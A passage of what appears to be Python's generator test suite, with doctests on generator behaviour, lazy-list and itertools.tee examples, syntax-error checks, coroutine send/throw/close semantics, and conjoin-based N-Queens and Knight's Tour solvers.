""" # Examples from Iterator-List and Python-Dev and c.l.py. email_tests = """ The difference between yielding None and returning it. >>> def g(): ... for i in range(3): ... yield None ... yield None ... return >>> list(g()) [None, None, None, None] Ensure that explicitly raising StopIteration acts like any other exception in try/except, not like a return. >>> def g(): ... yield 1 ... try: ... raise StopIteration ... except: ... yield 2 ... yield 3 >>> list(g()) [1, 2, 3] Next one was posted to c.l.py. >>> def gcomb(x, k): ... "Generate all combinations of k elements from list x." ... ... if k > len(x): ... return ... if k == 0: ... yield [] ... else: ... first, rest = x[0], x[1:] ... # A combination does or doesn't contain first. ... # If it does, the remainder is a k-1 comb of rest. ... for c in gcomb(rest, k-1): ... c.insert(0, first) ... yield c ... # If it doesn't contain first, it's a k comb of rest. ... for c in gcomb(rest, k): ... yield c >>> seq = list(range(1, 5)) >>> for k in range(len(seq) + 2): ... print("%d-combs of %s:" % (k, seq)) ... for c in gcomb(seq, k): ... print(" ", c) 0-combs of [1, 2, 3, 4]: [] 1-combs of [1, 2, 3, 4]: [1] [2] [3] [4] 2-combs of [1, 2, 3, 4]: [1, 2] [1, 3] [1, 4] [2, 3] [2, 4] [3, 4] 3-combs of [1, 2, 3, 4]: [1, 2, 3] [1, 2, 4] [1, 3, 4] [2, 3, 4] 4-combs of [1, 2, 3, 4]: [1, 2, 3, 4] 5-combs of [1, 2, 3, 4]: From the Iterators list, about the types of these things. >>> def g(): ... yield 1 ... >>> type(g) <class 'function'> >>> i = g() >>> type(i) <class 'generator'> >>> [s for s in dir(i) if not s.startswith('_')] ['close', 'gi_code', 'gi_frame', 'gi_running', 'send', 'throw'] >>> print(i.__next__.__doc__) x.__next__() <==> next(x) >>> iter(i) is i True >>> import types >>> isinstance(i, types.GeneratorType) True And more, added later. >>> i.gi_running 0 >>> type(i.gi_frame) <class 'frame'> >>> i.gi_running = 42 Traceback (most recent call last): ... AttributeError: readonly attribute >>> def g(): ... yield me.gi_running >>> me = g() >>> me.gi_running 0 >>> next(me) 1 >>> me.gi_running 0 A clever union-find implementation from c.l.py, due to David Eppstein. Sent: Friday, June 29, 2001 12:16 PM To: python-list@python.org Subject: Re: PEP 255: Simple Generators >>> class disjointSet: ... def __init__(self, name): ... self.name = name ... self.parent = None ... self.generator = self.generate() ... ... def generate(self): ... while not self.parent: ... yield self ... for x in self.parent.generator: ... yield x ... ... def find(self): ... return next(self.generator) ... ... def union(self, parent): ... if self.parent: ... raise ValueError("Sorry, I'm not a root!") ... self.parent = parent ... ... def __str__(self): ... return self.name >>> names = "ABCDEFGHIJKLM" >>> sets = [disjointSet(name) for name in names] >>> roots = sets[:] >>> import random >>> gen = random.Random(42) >>> while 1: ... for s in sets: ... print(" %s->%s" % (s, s.find()), end='') ... print() ... if len(roots) > 1: ... s1 = gen.choice(roots) ... roots.remove(s1) ... s2 = gen.choice(roots) ... s1.union(s2) ... print("merged", s1, "into", s2) ... else: ... break A->A B->B C->C D->D E->E F->F G->G H->H I->I J->J K->K L->L M->M merged K into B A->A B->B C->C D->D E->E F->F G->G H->H I->I J->J K->B L->L M->M merged A into F A->F B->B C->C D->D E->E F->F G->G H->H I->I J->J K->B L->L M->M merged E into F A->F B->B C->C D->D E->F F->F G->G H->H I->I J->J K->B L->L M->M merged D into C A->F B->B C->C D->C E->F F->F G->G H->H I->I J->J K->B L->L M->M merged M into C A->F B->B C->C D->C E->F F->F G->G H->H I->I J->J K->B L->L M->C merged J into B A->F B->B C->C D->C E->F F->F G->G H->H I->I J->B K->B L->L M->C merged B into C A->F B->C C->C D->C E->F F->F G->G H->H I->I J->C K->C L->L M->C merged F into G A->G B->C C->C D->C E->G F->G G->G H->H I->I J->C K->C L->L M->C merged L into C A->G B->C C->C D->C E->G F->G G->G H->H I->I J->C K->C L->C M->C merged G into I A->I B->C C->C D->C E->I F->I G->I H->H I->I J->C K->C L->C M->C merged I into H A->H B->C C->C D->C E->H F->H G->H H->H I->H J->C K->C L->C M->C merged C into H A->H B->H C->H D->H E->H F->H G->H H->H I->H J->H K->H L->H M->H """ # Emacs turd ' # Fun tests (for sufficiently warped notions of "fun"). fun_tests = """ Build up to a recursive Sieve of Eratosthenes generator. >>> def firstn(g, n): ... return [next(g) for i in range(n)] >>> def intsfrom(i): ... while 1: ... yield i ... i += 1 >>> firstn(intsfrom(5), 7) [5, 6, 7, 8, 9, 10, 11] >>> def exclude_multiples(n, ints): ... for i in ints: ... if i % n: ... yield i >>> firstn(exclude_multiples(3, intsfrom(1)), 6) [1, 2, 4, 5, 7, 8] >>> def sieve(ints): ... prime = next(ints) ... yield prime ... not_divisible_by_prime = exclude_multiples(prime, ints) ... for p in sieve(not_divisible_by_prime): ... yield p >>> primes = sieve(intsfrom(2)) >>> firstn(primes, 20) [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71] Another famous problem: generate all integers of the form 2**i * 3**j * 5**k in increasing order, where i,j,k >= 0. Trickier than it may look at first! Try writing it without generators, and correctly, and without generating 3 internal results for each result output. >>> def times(n, g): ... for i in g: ... yield n * i >>> firstn(times(10, intsfrom(1)), 10) [10, 20, 30, 40, 50, 60, 70, 80, 90, 100] >>> def merge(g, h): ... ng = next(g) ... nh = next(h) ... while 1: ... if ng < nh: ... yield ng ... ng = next(g) ... elif ng > nh: ... yield nh ... nh = next(h) ... else: ... yield ng ... ng = next(g) ... nh = next(h) The following works, but is doing a whale of a lot of redundant work -- it's not clear how to get the internal uses of m235 to share a single generator. Note that me_times2 (etc) each need to see every element in the result sequence. So this is an example where lazy lists are more natural (you can look at the head of a lazy list any number of times). >>> def m235(): ... yield 1 ... me_times2 = times(2, m235()) ... me_times3 = times(3, m235()) ... me_times5 = times(5, m235()) ... for i in merge(merge(me_times2, ... me_times3), ... me_times5): ... yield i Don't print "too many" of these -- the implementation above is extremely inefficient: each call of m235() leads to 3 recursive calls, and in turn each of those 3 more, and so on, and so on, until we've descended enough levels to satisfy the print stmts. Very odd: when I printed 5 lines of results below, this managed to screw up Win98's malloc in "the usual" way, i.e. the heap grew over 4Mb so Win98 started fragmenting address space, and it *looked* like a very slow leak. >>> result = m235() >>> for i in range(3): ... print(firstn(result, 15)) [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24] [25, 27, 30, 32, 36, 40, 45, 48, 50, 54, 60, 64, 72, 75, 80] [81, 90, 96, 100, 108, 120, 125, 128, 135, 144, 150, 160, 162, 180, 192] Heh. Here's one way to get a shared list, complete with an excruciating namespace renaming trick. The *pretty* part is that the times() and merge() functions can be reused as-is, because they only assume their stream arguments are iterable -- a LazyList is the same as a generator to times(). >>> class LazyList: ... def __init__(self, g): ... self.sofar = [] ... self.fetch = g.__next__ ... ... def __getitem__(self, i): ... sofar, fetch = self.sofar, self.fetch ... while i >= len(sofar): ... sofar.append(fetch()) ... return sofar[i] >>> def m235(): ... yield 1 ... # Gack: m235 below actually refers to a LazyList. ... me_times2 = times(2, m235) ... me_times3 = times(3, m235) ... me_times5 = times(5, m235) ... for i in merge(merge(me_times2, ... me_times3), ... me_times5): ... yield i Print as many of these as you like -- *this* implementation is memory- efficient. >>> m235 = LazyList(m235()) >>> for i in range(5): ... print([m235[j] for j in range(15*i, 15*(i+1))]) [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24] [25, 27, 30, 32, 36, 40, 45, 48, 50, 54, 60, 64, 72, 75, 80] [81, 90, 96, 100, 108, 120, 125, 128, 135, 144, 150, 160, 162, 180, 192] [200, 216, 225, 240, 243, 250, 256, 270, 288, 300, 320, 324, 360, 375, 384] [400, 405, 432, 450, 480, 486, 500, 512, 540, 576, 600, 625, 640, 648, 675] Ye olde Fibonacci generator, LazyList style. >>> def fibgen(a, b): ... ... def sum(g, h): ... while 1: ... yield next(g) + next(h) ... ... def tail(g): ... next(g) # throw first away ... for x in g: ... yield x ... ... yield a ... yield b ... for s in sum(iter(fib), ... tail(iter(fib))): ... yield s >>> fib = LazyList(fibgen(1, 2)) >>> firstn(iter(fib), 17) [1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597, 2584] Running after your tail with itertools.tee (new in version 2.4) The algorithms "m235" (Hamming) and Fibonacci presented above are both examples of a whole family of FP (functional programming) algorithms where a function produces and returns a list while the production algorithm suppose the list as already produced by recursively calling itself. For these algorithms to work, they must: - produce at least a first element without presupposing the existence of the rest of the list - produce their elements in a lazy manner To work efficiently, the beginning of the list must not be recomputed over and over again. This is ensured in most FP languages as a built-in feature. In python, we have to explicitly maintain a list of already computed results and abandon genuine recursivity. This is what had been attempted above with the LazyList class. One problem with that class is that it keeps a list of all of the generated results and therefore continually grows. This partially defeats the goal of the generator concept, viz. produce the results only as needed instead of producing them all and thereby wasting memory. Thanks to itertools.tee, it is now clear "how to get the internal uses of m235 to share a single generator". >>> from itertools import tee >>> def m235(): ... def _m235(): ... yield 1 ... for n in merge(times(2, m2), ... merge(times(3, m3), ... times(5, m5))): ... yield n ... m1 = _m235() ... m2, m3, m5, mRes = tee(m1, 4) ... return mRes >>> it = m235() >>> for i in range(5): ... print(firstn(it, 15)) [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24] [25, 27, 30, 32, 36, 40, 45, 48, 50, 54, 60, 64, 72, 75, 80] [81, 90, 96, 100, 108, 120, 125, 128, 135, 144, 150, 160, 162, 180, 192] [200, 216, 225, 240, 243, 250, 256, 270, 288, 300, 320, 324, 360, 375, 384] [400, 405, 432, 450, 480, 486, 500, 512, 540, 576, 600, 625, 640, 648, 675] The "tee" function does just what we want. It internally keeps a generated result for as long as it has not been "consumed" from all of the duplicated iterators, whereupon it is deleted. You can therefore print the hamming sequence during hours without increasing memory usage, or very little. The beauty of it is that recursive running-after-their-tail FP algorithms are quite straightforwardly expressed with this Python idiom. Ye olde Fibonacci generator, tee style. >>> def fib(): ... ... def _isum(g, h): ... while 1: ... yield next(g) + next(h) ... ... def _fib(): ... yield 1 ... yield 2 ... next(fibTail) # throw first away ... for res in _isum(fibHead, fibTail): ... yield res ... ... realfib = _fib() ... fibHead, fibTail, fibRes = tee(realfib, 3) ... return fibRes >>> firstn(fib(), 17) [1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597, 2584] """ # syntax_tests mostly provokes SyntaxErrors. Also fiddling with #if 0 # hackery. syntax_tests = """ >>> def f(): ... return 22 ... yield 1 Traceback (most recent call last): .. SyntaxError: 'return' with argument inside generator >>> def f(): ... yield 1 ... return 22 Traceback (most recent call last): .. SyntaxError: 'return' with argument inside generator "return None" is not the same as "return" in a generator: >>> def f(): ... yield 1 ... return None Traceback (most recent call last): .. SyntaxError: 'return' with argument inside generator These are fine: >>> def f(): ... yield 1 ... return >>> def f(): ... try: ... yield 1 ... finally: ... pass >>> def f(): ... try: ... try: ... 1//0 ... except ZeroDivisionError: ... yield 666 ... except: ... pass ... finally: ... pass >>> def f(): ... try: ... try: ... yield 12 ... 1//0 ... except ZeroDivisionError: ... yield 666 ... except: ... try: ... x = 12 ... finally: ... yield 12 ... except: ... return >>> list(f()) [12, 666] >>> def f(): ... yield >>> type(f()) <class 'generator'> >>> def f(): ... if 0: ... yield >>> type(f()) <class 'generator'> >>> def f(): ... if 0: ... yield 1 >>> type(f()) <class 'generator'> >>> def f(): ... if "": ... yield None >>> type(f()) <class 'generator'> >>> def f(): ... return ... try: ... if x==4: ... pass ... elif 0: ... try: ... 1//0 ... except SyntaxError: ... pass ... else: ... if 0: ... while 12: ... x += 1 ... yield 2 # don't blink ... f(a, b, c, d, e) ... else: ... pass ... except: ... x = 1 ... return >>> type(f()) <class 'generator'> >>> def f(): ... if 0: ... def g(): ... yield 1 ... >>> type(f()) <class 'NoneType'> >>> def f(): ... if 0: ... class C: ... def __init__(self): ... yield 1 ... def f(self): ... yield 2 >>> type(f()) <class 'NoneType'> >>> def f(): ... if 0: ... return ... if 0: ... yield 2 >>> type(f()) <class 'generator'> >>> def f(): ... if 0: ... lambda x: x # shouldn't trigger here ... return # or here ... def f(i): ... return 2*i # or here ... if 0: ... return 3 # but *this* sucks (line 8) ... if 0: ... yield 2 # because it's a generator (line 10) Traceback (most recent call last): SyntaxError: 'return' with argument inside generator This one caused a crash (see SF bug 567538): >>> def f(): ... for i in range(3): ... try: ... continue ... finally: ... yield i ... >>> g = f() >>> print(next(g)) 0 >>> print(next(g)) 1 >>> print(next(g)) 2 >>> print(next(g)) Traceback (most recent call last): StopIteration Test the gi_code attribute >>> def f(): ... yield 5 ... >>> g = f() >>> g.gi_code is f.__code__ True >>> next(g) 5 >>> next(g) Traceback (most recent call last): StopIteration >>> g.gi_code is f.__code__ True Test the __name__ attribute and the repr() >>> def f(): ... yield 5 ... >>> g = f() >>> g.__name__ 'f' >>> repr(g) # doctest: +ELLIPSIS '<generator object f at ...>' Lambdas shouldn't have their usual return behavior. >>> x = lambda: (yield 1) >>> list(x()) [1] >>> x = lambda: ((yield 1), (yield 2)) >>> list(x()) [1, 2] """ # conjoin is a simple backtracking generator, named in honor of Icon's # "conjunction" control structure. Pass a list of no-argument functions # that return iterable objects. Easiest to explain by example: assume the # function list [x, y, z] is passed. Then conjoin acts like: # # def g(): # values = [None] * 3 # for values[0] in x(): # for values[1] in y(): # for values[2] in z(): # yield values # # So some 3-lists of values *may* be generated, each time we successfully # get into the innermost loop. If an iterator fails (is exhausted) before # then, it "backtracks" to get the next value from the nearest enclosing # iterator (the one "to the left"), and starts all over again at the next # slot (pumps a fresh iterator). Of course this is most useful when the # iterators have side-effects, so that which values *can* be generated at # each slot depend on the values iterated at previous slots. def simple_conjoin(gs): values = [None] * len(gs) def gen(i): if i >= len(gs): yield values else: for values[i] in gs[i](): for x in gen(i+1): yield x for x in gen(0): yield x # That works fine, but recursing a level and checking i against len(gs) for # each item produced is inefficient. By doing manual loop unrolling across # generator boundaries, it's possible to eliminate most of that overhead. # This isn't worth the bother *in general* for generators, but conjoin() is # a core building block for some CPU-intensive generator applications. def conjoin(gs): n = len(gs) values = [None] * n # Do one loop nest at time recursively, until the # of loop nests # remaining is divisible by 3. def gen(i): if i >= n: yield values elif (n-i) % 3: ip1 = i+1 for values[i] in gs[i](): for x in gen(ip1): yield x else: for x in _gen3(i): yield x # Do three loop nests at a time, recursing only if at least three more # remain. Don't call directly: this is an internal optimization for # gen's use. def _gen3(i): assert i < n and (n-i) % 3 == 0 ip1, ip2, ip3 = i+1, i+2, i+3 g, g1, g2 = gs[i : ip3] if ip3 >= n: # These are the last three, so we can yield values directly. for values[i] in g(): for values[ip1] in g1(): for values[ip2] in g2(): yield values else: # At least 6 loop nests remain; peel off 3 and recurse for the # rest. for values[i] in g(): for values[ip1] in g1(): for values[ip2] in g2(): for x in _gen3(ip3): yield x for x in gen(0): yield x # And one more approach: For backtracking apps like the Knight's Tour # solver below, the number of backtracking levels can be enormous (one # level per square, for the Knight's Tour, so that e.g. a 100x100 board # needs 10,000 levels). In such cases Python is likely to run out of # stack space due to recursion. So here's a recursion-free version of # conjoin too. # NOTE WELL: This allows large problems to be solved with only trivial # demands on stack space. Without explicitly resumable generators, this is # much harder to achieve. OTOH, this is much slower (up to a factor of 2) # than the fancy unrolled recursive conjoin. def flat_conjoin(gs): # rename to conjoin to run tests with this instead n = len(gs) values = [None] * n iters = [None] * n _StopIteration = StopIteration # make local because caught a *lot* i = 0 while 1: # Descend. try: while i < n: it = iters[i] = gs[i]().__next__ values[i] = it() i += 1 except _StopIteration: pass else: assert i == n yield values # Backtrack until an older iterator can be resumed. i -= 1 while i >= 0: try: values[i] = iters[i]() # Success! Start fresh at next level. i += 1 break except _StopIteration: # Continue backtracking. i -= 1 else: assert i < 0 break # A conjoin-based N-Queens solver. class Queens: def __init__(self, n): self.n = n rangen = range(n) # Assign a unique int to each column and diagonal. # columns: n of those, range(n). # NW-SE diagonals: 2n-1 of these, i-j unique and invariant along # each, smallest i-j is 0-(n-1) = 1-n, so add n-1 to shift to 0- # based. # NE-SW diagonals: 2n-1 of these, i+j unique and invariant along # each, smallest i+j is 0, largest is 2n-2. # For each square, compute a bit vector of the columns and # diagonals it covers, and for each row compute a function that # generates the possiblities for the columns in that row. self.rowgenerators = [] for i in rangen: rowuses = [(1 << j) | # column ordinal (1 << (n + i-j + n-1)) | # NW-SE ordinal (1 << (n + 2*n-1 + i+j)) # NE-SW ordinal for j in rangen] def rowgen(rowuses=rowuses): for j in rangen: uses = rowuses[j] if uses & self.used == 0: self.used |= uses yield j self.used &= ~uses self.rowgenerators.append(rowgen) # Generate solutions. def solve(self): self.used = 0 for row2col in conjoin(self.rowgenerators): yield row2col def printsolution(self, row2col): n = self.n assert n == len(row2col) sep = "+" + "-+" * n print(sep) for i in range(n): squares = [" " for j in range(n)] squares[row2col[i]] = "Q" print("|" + "|".join(squares) + "|") print(sep) # A conjoin-based Knight's Tour solver. This is pretty sophisticated # (e.g., when used with flat_conjoin above, and passing hard=1 to the # constructor, a 200x200 Knight's Tour was found quickly -- note that we're # creating 10s of thousands of generators then!), and is lengthy. class Knights: def __init__(self, m, n, hard=0): self.m, self.n = m, n # solve() will set up succs[i] to be a list of square #i's # successors. succs = self.succs = [] # Remove i0 from each of its successor's successor lists, i.e. # successors can't go back to i0 again. Return 0 if we can # detect this makes a solution impossible, else return 1. def remove_from_successors(i0, len=len): # If we remove all exits from a free square, we're dead: # even if we move to it next, we can't leave it again. # If we create a square with one exit, we must visit it next; # else somebody else will have to visit it, and since there's # only one adjacent, there won't be a way to leave it again. # Finelly, if we create more than one free square with a # single exit, we can only move to one of them next, leaving # the other one a dead end. ne0 = ne1 = 0 for i in succs[i0]: s = succs[i] s.remove(i0) e = len(s) if e == 0: ne0 += 1 elif e == 1: ne1 += 1 return ne0 == 0 and ne1 < 2 # Put i0 back in each of its successor's successor lists. def add_to_successors(i0): for i in succs[i0]: succs[i].append(i0) # Generate the first move. def first(): if m < 1 or n < 1: return # Since we're looking for a cycle, it doesn't matter where we # start. Starting in a corner makes the 2nd move easy. corner = self.coords2index(0, 0) remove_from_successors(corner) self.lastij = corner yield corner add_to_successors(corner) # Generate the second moves. def second(): corner = self.coords2index(0, 0) assert self.lastij == corner # i.e., we started in the corner if m < 3 or n < 3: return assert len(succs[corner]) == 2 assert self.coords2index(1, 2) in succs[corner] assert self.coords2index(2, 1) in succs[corner] # Only two choices. Whichever we pick, the other must be the # square picked on move m*n, as it's the only way to get back # to (0, 0). Save its index in self.final so that moves before # the last know it must be kept free. for i, j in (1, 2), (2, 1): this = self.coords2index(i, j) final = self.coords2index(3-i, 3-j) self.final = final remove_from_successors(this) succs[final].append(corner) self.lastij = this yield this succs[final].remove(corner) add_to_successors(this) # Generate moves 3 thru m*n-1. def advance(len=len): # If some successor has only one exit, must take it. # Else favor successors with fewer exits. candidates = [] for i in succs[self.lastij]: e = len(succs[i]) assert e > 0, "else remove_from_successors() pruning flawed" if e == 1: candidates = [(e, i)] break candidates.append((e, i)) else: candidates.sort() for e, i in candidates: if i != self.final: if remove_from_successors(i): self.lastij = i yield i add_to_successors(i) # Generate moves 3 thru m*n-1. Alternative version using a # stronger (but more expensive) heuristic to order successors. # Since the # of backtracking levels is m*n, a poor move early on # can take eons to undo. Smallest square board for which this # matters a lot is 52x52. def advance_hard(vmid=(m-1)/2.0, hmid=(n-1)/2.0, len=len): # If some successor has only one exit, must take it. # Else favor successors with fewer exits. # Break ties via max distance from board centerpoint (favor # corners and edges whenever possible). candidates = [] for i in succs[self.lastij]: e = len(succs[i]) assert e > 0, "else remove_from_successors() pruning flawed" if e == 1: candidates = [(e, 0, i)] break i1, j1 = self.index2coords(i) d = (i1 - vmid)**2 + (j1 - hmid)**2 candidates.append((e, -d, i)) else: candidates.sort() for e, d, i in candidates: if i != self.final: if remove_from_successors(i): self.lastij = i yield i add_to_successors(i) # Generate the last move. def last(): assert self.final in succs[self.lastij] yield self.final if m*n < 4: self.squaregenerators = [first] else: self.squaregenerators = [first, second] + \ [hard and advance_hard or advance] * (m*n - 3) + \ [last] def coords2index(self, i, j): assert 0 <= i < self.m assert 0 <= j < self.n return i * self.n + j def index2coords(self, index): assert 0 <= index < self.m * self.n return divmod(index, self.n) def _init_board(self): succs = self.succs del succs[:] m, n = self.m, self.n c2i = self.coords2index offsets = [( 1, 2), ( 2, 1), ( 2, -1), ( 1, -2), (-1, -2), (-2, -1), (-2, 1), (-1, 2)] rangen = range(n) for i in range(m): for j in rangen: s = [c2i(i+io, j+jo) for io, jo in offsets if 0 <= i+io < m and 0 <= j+jo < n] succs.append(s) # Generate solutions. def solve(self): self._init_board() for x in conjoin(self.squaregenerators): yield x def printsolution(self, x): m, n = self.m, self.n assert len(x) == m*n w = len(str(m*n)) format = "%" + str(w) + "d" squares = [[None] * n for i in range(m)] k = 1 for i in x: i1, j1 = self.index2coords(i) squares[i1][j1] = format % k k += 1 sep = "+" + ("-" * w + "+") * n print(sep) for i in range(m): row = squares[i] print("|" + "|".join(row) + "|") print(sep) conjoin_tests = """ Generate the 3-bit binary numbers in order. This illustrates dumbest- possible use of conjoin, just to generate the full cross-product. >>> for c in conjoin([lambda: iter((0, 1))] * 3): ... print(c) [0, 0, 0] [0, 0, 1] [0, 1, 0] [0, 1, 1] [1, 0, 0] [1, 0, 1] [1, 1, 0] [1, 1, 1] For efficiency in typical backtracking apps, conjoin() yields the same list object each time. So if you want to save away a full account of its generated sequence, you need to copy its results. >>> def gencopy(iterator): ... for x in iterator: ... yield x[:] >>> for n in range(10): ... all = list(gencopy(conjoin([lambda: iter((0, 1))] * n))) ... print(n, len(all), all[0] == [0] * n, all[-1] == [1] * n) 0 1 True True 1 2 True True 2 4 True True 3 8 True True 4 16 True True 5 32 True True 6 64 True True 7 128 True True 8 256 True True 9 512 True True And run an 8-queens solver. >>> q = Queens(8) >>> LIMIT = 2 >>> count = 0 >>> for row2col in q.solve(): ... count += 1 ... if count <= LIMIT: ... print("Solution", count) ... q.printsolution(row2col) Solution 1 +-+-+-+-+-+-+-+-+ |Q| | | | | | | | +-+-+-+-+-+-+-+-+ | | | | |Q| | | | +-+-+-+-+-+-+-+-+ | | | | | | | |Q| +-+-+-+-+-+-+-+-+ | | | | | |Q| | | +-+-+-+-+-+-+-+-+ | | |Q| | | | | | +-+-+-+-+-+-+-+-+ | | | | | | |Q| | +-+-+-+-+-+-+-+-+ | |Q| | | | | | | +-+-+-+-+-+-+-+-+ | | | |Q| | | | | +-+-+-+-+-+-+-+-+ Solution 2 +-+-+-+-+-+-+-+-+ |Q| | | | | | | | +-+-+-+-+-+-+-+-+ | | | | | |Q| | | +-+-+-+-+-+-+-+-+ | | | | | | | |Q| +-+-+-+-+-+-+-+-+ | | |Q| | | | | | +-+-+-+-+-+-+-+-+ | | | | | | |Q| | +-+-+-+-+-+-+-+-+ | | | |Q| | | | | +-+-+-+-+-+-+-+-+ | |Q| | | | | | | +-+-+-+-+-+-+-+-+ | | | | |Q| | | | +-+-+-+-+-+-+-+-+ >>> print(count, "solutions in all.") 92 solutions in all. And run a Knight's Tour on a 10x10 board. Note that there are about 20,000 solutions even on a 6x6 board, so don't dare run this to exhaustion. >>> k = Knights(10, 10) >>> LIMIT = 2 >>> count = 0 >>> for x in k.solve(): ... count += 1 ... if count <= LIMIT: ... print("Solution", count) ... k.printsolution(x) ... else: ... break Solution 1 +---+---+---+---+---+---+---+---+---+---+ | 1| 58| 27| 34| 3| 40| 29| 10| 5| 8| +---+---+---+---+---+---+---+---+---+---+ | 26| 35| 2| 57| 28| 33| 4| 7| 30| 11| +---+---+---+---+---+---+---+---+---+---+ | 59|100| 73| 36| 41| 56| 39| 32| 9| 6| +---+---+---+---+---+---+---+---+---+---+ | 74| 25| 60| 55| 72| 37| 42| 49| 12| 31| +---+---+---+---+---+---+---+---+---+---+ | 61| 86| 99| 76| 63| 52| 47| 38| 43| 50| +---+---+---+---+---+---+---+---+---+---+ | 24| 75| 62| 85| 54| 71| 64| 51| 48| 13| +---+---+---+---+---+---+---+---+---+---+ | 87| 98| 91| 80| 77| 84| 53| 46| 65| 44| +---+---+---+---+---+---+---+---+---+---+ | 90| 23| 88| 95| 70| 79| 68| 83| 14| 17| +---+---+---+---+---+---+---+---+---+---+ | 97| 92| 21| 78| 81| 94| 19| 16| 45| 66| +---+---+---+---+---+---+---+---+---+---+ | 22| 89| 96| 93| 20| 69| 82| 67| 18| 15| +---+---+---+---+---+---+---+---+---+---+ Solution 2 +---+---+---+---+---+---+---+---+---+---+ | 1| 58| 27| 34| 3| 40| 29| 10| 5| 8| +---+---+---+---+---+---+---+---+---+---+ | 26| 35| 2| 57| 28| 33| 4| 7| 30| 11| +---+---+---+---+---+---+---+---+---+---+ | 59|100| 73| 36| 41| 56| 39| 32| 9| 6| +---+---+---+---+---+---+---+---+---+---+ | 74| 25| 60| 55| 72| 37| 42| 49| 12| 31| +---+---+---+---+---+---+---+---+---+---+ | 61| 86| 99| 76| 63| 52| 47| 38| 43| 50| +---+---+---+---+---+---+---+---+---+---+ | 24| 75| 62| 85| 54| 71| 64| 51| 48| 13| +---+---+---+---+---+---+---+---+---+---+ | 87| 98| 89| 80| 77| 84| 53| 46| 65| 44| +---+---+---+---+---+---+---+---+---+---+ | 90| 23| 92| 95| 70| 79| 68| 83| 14| 17| +---+---+---+---+---+---+---+---+---+---+ | 97| 88| 21| 78| 81| 94| 19| 16| 45| 66| +---+---+---+---+---+---+---+---+---+---+ | 22| 91| 96| 93| 20| 69| 82| 67| 18| 15| +---+---+---+---+---+---+---+---+---+---+ """ weakref_tests = """\ Generators are weakly referencable: >>> import weakref >>> def gen(): ... yield 'foo!' ... >>> wr = weakref.ref(gen) >>> wr() is gen True >>> p = weakref.proxy(gen) Generator-iterators are weakly referencable as well: >>> gi = gen() >>> wr = weakref.ref(gi) >>> wr() is gi True >>> p = weakref.proxy(gi) >>> list(p) ['foo!'] """ coroutine_tests = """\ Sending a value into a started generator: >>> def f(): ... print((yield 1)) ... yield 2 >>> g = f() >>> next(g) 1 >>> g.send(42) 42 2 Sending a value into a new generator produces a TypeError: >>> f().send("foo") Traceback (most recent call last): ... TypeError: can't send non-None value to a just-started generator Yield by itself yields None: >>> def f(): yield >>> list(f()) [None] An obscene abuse of a yield expression within a generator expression: >>> list((yield 21) for i in range(4)) [21, None, 21, None, 21, None, 21, None] And a more sane, but still weird usage: >>> def f(): list(i for i in [(yield 26)]) >>> type(f()) <class 'generator'> A yield expression with augmented assignment. >>> def coroutine(seq): ... count = 0 ... while count < 200: ... count += yield ... seq.append(count) >>> seq = [] >>> c = coroutine(seq) >>> next(c) >>> print(seq) [] >>> c.send(10) >>> print(seq) [10] >>> c.send(10) >>> print(seq) [10, 20] >>> c.send(10) >>> print(seq) [10, 20, 30] Check some syntax errors for yield expressions: >>> f=lambda: (yield 1),(yield 2) Traceback (most recent call last): ... SyntaxError: 'yield' outside function >>> def f(): return lambda x=(yield): 1 Traceback (most recent call last): ... SyntaxError: 'return' with argument inside generator >>> def f(): x = yield = y Traceback (most recent call last): ... SyntaxError: assignment to yield expression not possible >>> def f(): (yield bar) = y Traceback (most recent call last): ... SyntaxError: can't assign to yield expression >>> def f(): (yield bar) += y Traceback (most recent call last): ... SyntaxError: can't assign to yield expression Now check some throw() conditions: >>> def f(): ... while True: ... try: ... print((yield)) ... except ValueError as v: ... print("caught ValueError (%s)" % (v)) >>> import sys >>> g = f() >>> next(g) >>> g.throw(ValueError) # type only caught ValueError () >>> g.throw(ValueError("xyz")) # value only caught ValueError (xyz) >>> g.throw(ValueError, ValueError(1)) # value+matching type caught ValueError (1) >>> g.throw(ValueError, TypeError(1)) # mismatched type, rewrapped caught ValueError (1) >>> g.throw(ValueError, ValueError(1), None) # explicit None traceback caught ValueError (1) >>> g.throw(ValueError(1), "foo") # bad args Traceback (most recent call last): ... TypeError: instance exception may not have a separate value >>> g.throw(ValueError, "foo", 23) # bad args Traceback (most recent call last): ... TypeError: throw() third argument must be a traceback object >>> g.throw("abc") Traceback (most recent call last): ... TypeError: exceptions must be classes or instances deriving from BaseException, not str >>> g.throw(0) Traceback (most recent call last): ... TypeError: exceptions must be classes or instances deriving from BaseException, not int >>> g.throw(list) Traceback (most recent call last): ... TypeError: exceptions must be classes or instances deriving from BaseException, not type >>> def throw(g,exc): ... try: ... raise exc ... except: ... g.throw(*sys.exc_info()) >>> throw(g,ValueError) # do it with traceback included caught ValueError () >>> g.send(1) 1 >>> throw(g,TypeError) # terminate the generator Traceback (most recent call last): ... TypeError >>> print(g.gi_frame) None >>> g.send(2) Traceback (most recent call last): ... StopIteration >>> g.throw(ValueError,6) # throw on closed generator Traceback (most recent call last): ... ValueError: 6 >>> f().throw(ValueError,7) # throw on just-opened generator Traceback (most recent call last): ... ValueError: 7 Now let's try closing a generator: >>> def f(): ... try: yield ... except GeneratorExit: ... print("exiting") >>> g = f() >>> next(g) >>> g.close() exiting >>> g.close() # should be no-op now >>> f().close() # close on just-opened generator should be fine >>> def f(): yield # an even simpler generator >>> f().close() # close before opening >>> g = f() >>> next(g) >>> g.close() # close normally And finalization: >>> def f(): ... try: yield ... finally: ... print("exiting") >>> g = f() >>> next(g) >>> del g exiting GeneratorExit is not caught by except Exception: >>> def f(): ... try: yield ... except Exception: ... print('except') ... finally: ... print('finally') >>> g = f() >>> next(g) >>> del g finally Now let's try some ill-behaved generators: >>> def f(): ... try: yield ... except GeneratorExit: ... yield "foo!" >>> g = f() >>> next(g) >>> g.close() Traceback (most recent call last): ... RuntimeError: generator ignored GeneratorExit >>> g.close() Our ill-behaved code should be invoked during GC: >>> import sys, io >>> old, sys.stderr = sys.stderr, io.StringIO() >>> g = f() >>> next(g) >>> del g >>> 